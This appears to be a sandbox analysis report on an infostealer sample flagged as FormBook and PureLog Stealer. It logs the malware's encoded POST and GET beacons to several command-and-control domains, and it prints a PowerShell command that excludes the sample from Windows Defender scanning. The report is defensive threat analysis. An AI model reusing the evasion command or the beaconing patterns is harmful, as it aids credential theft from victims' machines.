                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Ascii: T4OdNH=I55yQdyYHz9LxbYZy13B8KQCm9Vx1Xn1JALhMqAF91wu4YKo1HsiRvs+S2FS9Ophrf07CAVRXw02KUwfdApDUxPhO91x9XtGTFiIMzt0/8HmBuGVxxAKE/QW7BkeZWg4uZ/p5PcghK68+3Qiv1K19c0B4NkwHVWRjOz4IkDj4fW5w8Gu+H1R6xPXkvQq18ngok8zE9+CWgeS
                                                                                          Jan 8, 2025 15:02:00.151731014 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Wed, 08 Jan 2025 14:01:59 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 315
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          34 | 192.168.2.6 | 50010 | 103.247.11.204 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 15:02:01.764235020 CET | 790 | OUT | POST /vw2j/ HTTP/1.1
                                                                                          Host: www.itcomp.store
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.itcomp.store
                                                                                          Referer: http://www.itcomp.store/vw2j/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 235
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Ascii: T4OdNH=I55yQdyYHz9Lw5MZxSbB0KQF4NVx/3nxJAHhMuwv9GUu546oyGsiWvs+dWEYzup/rfwzCF1RXww2KVAfdzBCVhPjXN1v5XtGTFiIMwRS/8vmCf2VxU8JNfQV4BkeIGg8uZ+E5MYKhM28+ysiuheq3c0979k7K3LDjPeLNX/w7YK+1Kb0i01yohvVktIY1cnKqkEzWqylZU7xWiTIZy3AluxZK3M4XAHWoA==
                                                                                          Jan 8, 2025 15:02:02.760051012 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Wed, 08 Jan 2025 14:02:01 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 315
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          35 | 192.168.2.6 | 50011 | 103.247.11.204 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 15:02:04.531076908 CET | 1803 | OUT | POST /vw2j/ HTTP/1.1
                                                                                          Host: www.itcomp.store
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.itcomp.store
                                                                                          Referer: http://www.itcomp.store/vw2j/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1247
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Ascii: T4OdNH=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 [TRUNCATED]
                                                                                          Jan 8, 2025 15:02:05.511255980 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Wed, 08 Jan 2025 14:02:04 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 315
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                          Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                          36    192.168.2.6    50012    103.247.11.204    80    2300    C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp    Bytes transferred    Direction    Data
                                                                                          Jan 8, 2025 15:02:07.072051048 CET    513    OUT    GET /vw2j/?T4OdNH=F7RSTrW3DDBOwoki0QfY8aMemtw+1yb0ACfdAp004E8YzbKK22gfddsBa0Epuash8ZsdFHh4aRsfLVhTQDdPUk63V/0r5CFiWCnEBQtSiunsCfq281UiBsQJqTZKZhMxvZDp0qs=&r4=tP5HWLt8wXstw4H HTTP/1.1
                                                                                          Host: www.itcomp.store
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Jan 8, 2025 15:02:08.108771086 CET    479    IN    HTTP/1.1 404 Not Found
                                                                                          Date: Wed, 08 Jan 2025 14:02:07 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 315
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                          Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                          37    192.168.2.6    50013    192.186.58.31    80    2300    C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp    Bytes transferred    Direction    Data
                                                                                          Jan 8, 2025 15:02:48.661592007 CET    514    OUT    GET /rdtl/?T4OdNH=ZOY+qajotO8Y54RWsMlJRfAzJROg7M0EIy2xGwNHpdBqbD/KLW5LjtA9XnFn7YFdiYP1wWcAq05pnCTjdSlGxG6S3f6vZO/FXf/kuh5YN7SlcCVE00CSvDbDDRrbh0G7SoDKmOo=&r4=tP5HWLt8wXstw4H HTTP/1.1
                                                                                          Host: www.aihuzhibo.net
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Jan 8, 2025 15:02:49.664712906 CET    1236    IN    HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 14:02:49 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          Data Ascii: ffc0<!DOCTYPE html><html lang="zh-cmn-Hans"><head><title>kk&#30452;&#25773;&#23433;&#21331;&#26368;&#26032;&#29256;&#20813;&#36153;&#23433;&#35013;</title><meta http-equiv="keywords" content="kk&#30452;&#25773;"><meta http-equiv="description" content="&#27426;&#36814;&#20351;&#29992;kk&#30452;&#25773;&#25903;&#25345;:32/64bit&#25105;&#20204;&#20026;&#24744;&#25552;&#20379;:&#30495;&#20154;,&#26827;/&#29260;&#20307;&#32946;,&#24425;/&#31080;&#30005;&#23376;,kk&#30452;&#25773;&#23433;&#21331;&#23448;&#26041;&#19979;&#36733;&#20307;&#39564;&#24179;&#21488;&#36824;&#35774;&#26377;&#31038;&#21306;&#21151;&#33021;&#35753;&#20320;&#19982;&#20854;&#20182;&#20307;&#32946;&#29233;&#22909;&#32773;&#19968;&#36215;&#20998;&#20139;&#36816;&#21160;&#24515;&#24471;&#20132;&#27969;&#32463;&#39564;&#32467;&#20132;&#26379;&#21451;"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="applicable-device" content="pc"><link rel="alternate" media="only s [TRUNCATED]
                                                                                          Jan 8, 2025 15:02:49.664730072 CET    224    IN
                                                                                          Data Ascii: www.aihuzhibo.net/rdtl/"><meta name="mobile-agent" content="format=xhtml;url=http://www.aihuzhibo.net/rdtl/"><meta name="mobile-agent" content="format=html5;url=http://www.aihuzhibo.net/rdtl/"><meta http-equiv="Cache-Control
                                                                                          Jan 8, 2025 15:02:49.664742947 CET    1236    IN
                                                                                          Data Ascii: " content="no-siteapp"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no"><link rel="
                                                                                          Jan 8, 2025 15:02:49.664762020 CET    224    IN
                                                                                          Data Ascii: put type="hidden" id="__resourceType" value="0"><input type="hidden" id="__isDirectDl" value="0"><bdo lang="877753"></bdo><dfn draggable="c79c2b"></dfn><font dropzone="53dec1"></font><div dir="aa4b71" class="ce3811 topbanner
                                                                                          Jan 8, 2025 15:02:49.664798975 CET    1236    IN
                                                                                          Data Ascii: hide"><a href=""><img lang="e38114" src=""></a></div><input type="hidden" id="__directDlHsCh" value="pc_seo_kk&#30452;&#25773;_hzyx"><script src="http://www.aihuzhibo.net/template/news/wandoujia/static/js/realNameAuth.js" crossorigin="anonymo
                                                                                          Jan 8, 2025 15:02:49.664812088 CET    224    IN
                                                                                          Data Ascii: name="key" value="" autocomplete="off" placeholder="" id="j-search-input"><input type="submit" value="" class="kf9ee7 submit" id="j-search-btn"><input type="hidden" name="source" value="deta
                                                                                          Jan 8, 2025 15:02:49.664824963 CET    1236    IN
                                                                                          Data Ascii: il"></form><small lang="74d5f6"></small><sup draggable="1733b7"></sup><time dropzone="328ff8"></time><div lang="2f401a" class="lad5eb user-info"><img draggable="757e42" class="md8d19 avatar" id="header_avatar" src="http://www.aihuzhibo.net/tem
                                                                                          Jan 8, 2025 15:02:49.664880037 CET    1236    IN
                                                                                          Data Ascii: 2f42 nav-item"><a class="b476fc first-link" href="/special"><span></span></a></li><li class="cb69bb nav-item"><a class="df143a first-link" href="/award"><span></span></a></li><li class="e6de6d nav-item"><a class="f188f7 first
                                                                                          Jan 8, 2025 15:02:49.664891958 CET    1236    IN
                                                                                          Data Ascii: </div><time dir="01b218"></time><tt lang="12c38a"></tt><var draggable="5a60b1"></var><div date-time="a95f14" class="o67293 input-wrap"><input type="text" id="login_phone" class="p51173 inner-input" placeholder="
                                                                                          Jan 8, 2025 15:02:49.664902925 CET    104    IN
                                                                                          Data Ascii: ror"></div></div><font dropzone="53dab7"></font><ins date-time="3616fb"></ins><small dir="6dab63"></smal
                                                                                          Jan 8, 2025 15:02:49.669739008 CET    1236    IN
                                                                                          Data Ascii: l><div dir="f4de1f" id="login_nc" class="y92aee nc-wrap"></div><sup lang="b2dee8"></sup><time draggable="5f34dc"></time><tt dropzone="086ca8"></tt><div lang="868262" class="z2b63d check-privacy"><span id="login_readAgree" class="a5bb68 checkbo


                                                                                          Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                          38    192.168.2.6    50014    154.213.39.66    80    2300    C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp    Bytes transferred    Direction    Data
                                                                                          Jan 8, 2025 15:02:55.854608059 CET    778    OUT    POST /cu07/ HTTP/1.1
                                                                                          Host: www.f5jh81t3k1w8.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.f5jh81t3k1w8.sbs
                                                                                          Referer: http://www.f5jh81t3k1w8.sbs/cu07/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 211
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Ascii: T4OdNH=w3n7Px+0LxK5Eu/hS037xNCx/a5iNDTWBsVB3T9LR0Y9qbvBcf9Sgyv1tXNZLl6E3LUIQ51a0um64lFopiZYP8l8rpoL+TRKqeQzm3fIR6vnVDwF4fc1CG/KTBCOzcE5uNEEuDMvVHQcVZfzx5RhQDdOo2N1fsXV30UVYnE0u5gXuR8XSzJSdziIQHNVfG/nxUx46QtO10+N
                                                                                          Jan 8, 2025 15:02:56.720065117 CET    691    IN    HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 14:02:56 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 548
                                                                                          Connection: close
                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                          Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                          39    192.168.2.6    50015    154.213.39.66    80    2300    C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp    Bytes transferred    Direction    Data
                                                                                          Jan 8, 2025 15:02:58.524048090 CET    802    OUT    POST /cu07/ HTTP/1.1
                                                                                          Host: www.f5jh81t3k1w8.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.f5jh81t3k1w8.sbs
                                                                                          Referer: http://www.f5jh81t3k1w8.sbs/cu07/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 235
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Ascii: T4OdNH=w3n7Px+0LxK5EOvhRXf73tCwhK5iHjTSBsRB3WcTRm89q+DBdclSnyv1i3NQFF6P3LZiQ55a0uy64l1opxxZOsl+mJoN6TRKqeQzmz2nR63nUzgF76w0Mm/VExCO58E9uNFpuCRAVBUcVYPzxrpiFTdIiWMgQdOb30dnS0E2wqY0vnhNOAJxPjCKQFVnfm/NzUJ4oHhp6AbusmJclf8Dj7IaC07QBMFrBQ==
                                                                                          Jan 8, 2025 15:02:59.365149021 CET    691    IN    HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 14:02:59 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 548
                                                                                          Connection: close
                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                          Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                          40    192.168.2.6    50016    154.213.39.66    80    2300    C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp    Bytes transferred    Direction    Data
                                                                                          Jan 8, 2025 15:03:01.077356100 CET    1815    OUT    POST /cu07/ HTTP/1.1
                                                                                          Host: www.f5jh81t3k1w8.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.f5jh81t3k1w8.sbs
                                                                                          Referer: http://www.f5jh81t3k1w8.sbs/cu07/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1247
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Jan 8, 2025 15:03:02.605134010 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 14:03:01 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 548
                                                                                          Connection: close
                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                          Jan 8, 2025 15:03:02.605355024 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 14:03:01 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 548
                                                                                          Connection: close
                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                          Jan 8, 2025 15:03:02.605835915 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 14:03:01 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 548
                                                                                          Connection: close
                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          41 | 192.168.2.6 | 50017 | 154.213.39.66 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 15:03:03.783493042 CET | 517 | OUT | GET /cu07/?T4OdNH=91PbMFSFbRabMZnMSUj76NvR/Zd0MhT8JKpW4EQcOk8mlMTVcdIaqQPrq3FRSR+owpFtRocVxvjr424E5RpVHJgZhbFN+EtYqaINmBGTcL2VcGMzu+tmB3TsTAvOn48cudhpsmM=&r4=tP5HWLt8wXstw4H HTTP/1.1
                                                                                          Host: www.f5jh81t3k1w8.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Jan 8, 2025 15:03:04.648199081 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 14:03:04 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 548
                                                                                          Connection: close
                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->



                                                                                          Target ID:0
                                                                                          Start time:08:58:58
                                                                                          Start date:08/01/2025
                                                                                          Path:C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe"
                                                                                          Imagebase:0xc30000
                                                                                          File size:882'688 bytes
                                                                                          MD5 hash:FA117772A94F43197A4632F47E78A56D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2127145290.0000000005A90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2123760406.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:3
                                                                                          Start time:08:58:59
                                                                                          Start date:08/01/2025
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe"
                                                                                          Imagebase:0x410000
                                                                                          File size:433'152 bytes
                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:4
                                                                                          Start time:08:58:59
                                                                                          Start date:08/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:5
                                                                                          Start time:08:58:59
                                                                                          Start date:08/01/2025
                                                                                          Path:C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe"
                                                                                          Imagebase:0xdb0000
                                                                                          File size:882'688 bytes
                                                                                          MD5 hash:FA117772A94F43197A4632F47E78A56D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2292332224.0000000001DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2290414447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2294192340.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:6
                                                                                          Start time:08:59:10
                                                                                          Start date:08/01/2025
                                                                                          Path:C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe"
                                                                                          Imagebase:0xb40000
                                                                                          File size:140'800 bytes
                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4560972615.00000000026E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:7
                                                                                          Start time:08:59:12
                                                                                          Start date:08/01/2025
                                                                                          Path:C:\Windows\SysWOW64\Utilman.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\SysWOW64\Utilman.exe"
                                                                                          Imagebase:0xb50000
                                                                                          File size:97'280 bytes
                                                                                          MD5 hash:4F59EE095E37A83CDCB74091C807AFA9
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4561456919.0000000004F50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4561622867.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:moderate
                                                                                          Has exited:false

                                                                                          Target ID:9
                                                                                          Start time:08:59:26
                                                                                          Start date:08/01/2025
                                                                                          Path:C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe"
                                                                                          Imagebase:0xb40000
                                                                                          File size:140'800 bytes
                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4563177809.0000000004F10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
